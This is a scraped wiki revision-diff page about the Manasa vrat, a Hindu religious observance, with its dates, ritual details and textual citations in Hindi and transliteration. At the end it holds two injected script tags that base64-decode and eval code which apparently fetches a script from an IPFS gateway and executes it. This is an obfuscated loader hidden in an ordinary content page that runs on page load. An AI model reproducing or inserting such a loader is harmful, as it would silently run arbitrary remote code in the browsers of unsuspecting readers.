Difference between revisions of "मनसा व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - "ref>(" to "ref>")
Line 2: Line 2:
 
*[[ज्येष्ठ]] [[शुक्ल पक्ष|शुक्ल]] नवमी पर जब [[हस्त नक्षत्र]] हो या [[द्वादशी]] पर जब हस्त नक्षत्र न भी हो।
 
*[[ज्येष्ठ]] [[शुक्ल पक्ष|शुक्ल]] नवमी पर जब [[हस्त नक्षत्र]] हो या [[द्वादशी]] पर जब हस्त नक्षत्र न भी हो।
 
*मनसा देवी की पूजा स्नूही पौधे की टहनी पर की जाती है।  
 
*मनसा देवी की पूजा स्नूही पौधे की टहनी पर की जाती है।  
*कृत्यरत्नाकर<ref>(कृत्यरत्नाकर 233 एवं कृत्यत्तव 437)</ref>, हेमाद्रि<ref>हेमाद्रि (काल, 621, भविष्यपुराण से उद्धरण)</ref> का कथन है कि मनसा की पूजा आकाश कृष्ण पंचमी को होनी चाहिए।<ref>श्री ए0 सी0 सेन कृत 'बंगाली लैंग्वेज एण्ड लिटरेचर'; पृ0 257-276, जहाँ मनसा देवी एवं मनसा मंगला की गाथा दी हुई है; श्रावण कृष्ण 11 को मनसा पूजा का उल्लेख है।</ref>  
+
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर 233 एवं कृत्यत्तव 437)</ref>, हेमाद्रि<ref>हेमाद्रि (काल, 621, भविष्यपुराण से उद्धरण)</ref> का कथन है कि मनसा की पूजा आकाश कृष्ण पंचमी को होनी चाहिए।<ref>श्री ए0 सी0 सेन कृत 'बंगाली लैंग्वेज एण्ड लिटरेचर'; पृ0 257-276, जहाँ मनसा देवी एवं मनसा मंगला की गाथा दी हुई है; श्रावण कृष्ण 11 को मनसा पूजा का उल्लेख है।</ref>  
 
 
 
 
  

Revision as of 12:11, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jyeshth shukl navami par jab hast nakshatr ho ya dvadashi par jab hast nakshatr n bhi ho.
  • manasa devi ki pooja snoohi paudhe ki tahani par ki jati hai.
  • krityaratnakar[1], hemadri[2] ka kathan hai ki manasa ki pooja akash krishna panchami ko honi chahie.[3]

 


tika tippani aur sandarbh

  1. krityaratnakar 233 evan krityattav 437)
  2. hemadri (kal, 621, bhavishyapuran se uddharan)
  3. shri e0 si0 sen krit 'bangali laiangvej end litarechar'; pri0 257-276, jahaan manasa devi evan manasa mangala ki gatha di huee hai; shravan krishna 11 ko manasa pooja ka ullekh hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>